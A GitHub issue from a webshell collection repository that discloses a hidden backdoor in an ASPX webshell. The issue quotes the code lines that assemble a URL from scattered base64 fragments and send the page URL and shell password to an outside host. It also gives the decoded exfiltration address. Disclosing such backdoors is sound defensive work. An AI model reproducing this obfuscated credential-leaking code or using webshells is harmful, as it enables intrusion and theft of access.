Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Backdoor in webshell #1

Open
M3chD09 opened this issue Jun 25, 2018 · 0 comments
Open

Backdoor in webshell #1

M3chD09 opened this issue Jun 25, 2018 · 0 comments

Comments

@M3chD09
Copy link

M3chD09 commented Jun 25, 2018

Here is one I found.

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 54 in f7cd87f

HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create(YfCnP + this.Request.Url.ToString() + pbzw + Password + ""); HttpWebResponse response = (HttpWebResponse)request.GetResponse();

Variable YfCnP is base64 encoded.

WebShell/Aspx/专版aspx汗血宝马.aspx

Lines 39 to 49 in f7cd87f

string YfCnP = sh;
YfCnP += portble;
YfCnP += vcf;
YfCnP += dwgtg;
YfCnP += bin_data;
YfCnP += fuze;
YfCnP += ouj;
YfCnP += tprq;
YfCnP += idodr;
YfCnP += mtg;
YfCnP += ksgr;

WebShell/Aspx/专版aspx汗血宝马.aspx

Lines 519 to 529 in f7cd87f

ksgr = Encoding.Default.GetString(Convert.FromBase64String(ksgr));
mtg = Encoding.Default.GetString(Convert.FromBase64String(mtg));
idodr = Encoding.Default.GetString(Convert.FromBase64String(idodr));
tprq = Encoding.Default.GetString(Convert.FromBase64String(tprq));
ouj = Encoding.Default.GetString(Convert.FromBase64String(ouj));
fuze = Encoding.Default.GetString(Convert.FromBase64String(fuze));
bin_data = Encoding.Default.GetString(Convert.FromBase64String(bin_data));
dwgtg = Encoding.Default.GetString(Convert.FromBase64String(dwgtg));
vcf = Encoding.Default.GetString(Convert.FromBase64String(vcf));
portble = Encoding.Default.GetString(Convert.FromBase64String(portble));
sh = Encoding.Default.GetString(Convert.FromBase64String(sh));

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 2081 in f7cd87f

string sh = "aHR0";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 1724 in f7cd87f

string portble = "cDovLw==";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 1662 in f7cd87f

string vcf = "d3c=";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 1561 in f7cd87f

string dwgtg = "dy50cm95";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 1495 in f7cd87f

string bin_data = "cGxhbi4=";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 1466 in f7cd87f

string fuze = "Y29tL2FydGlj";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 1449 in f7cd87f

string ouj = "bGUvaQ==";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 1297 in f7cd87f

string tprq = "bmZvLw==";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 1179 in f7cd87f

string idodr = "Z2suYXM=";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 589 in f7cd87f

string mtg = "cHg=";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 499 in f7cd87f

string ksgr = "P25hbWU9";

Decode YfCnP:
http://www.troyplan.com/article/info/gk.aspx?name=
Maybe there are more backdoors in webshells, use with caution.

Don't be evil.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@M3chD09